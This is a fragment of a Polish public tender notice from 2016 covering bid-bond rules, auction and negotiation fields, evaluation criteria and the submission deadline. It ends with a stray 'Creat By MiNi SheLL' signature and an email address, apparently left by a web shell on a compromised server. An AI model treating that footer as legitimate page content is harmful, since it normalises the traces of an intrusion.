     zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do 
     zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, 
     następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/ 
     poręczyciela.
8. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form 
     wadium Wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta 
     podlegać będzie odrzuceniu.
9. Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze 
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, 
     którego oferta zostanie wybrana jako najkorzystniejsza.
10. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci 
     wadium niezwłocznie po zawarciu umowy.
11. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę 
     przed upływem terminu składania ofert.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadku wystąpienia przesłanek 
     określonych w art. 46 ust. 4a i 5 ustawy Pzp.
13. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych art.45 i46 pzp.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>OKRES RĘKOIMI</td><td>40</td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/10/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język  polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                do: 03/10/2016<br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com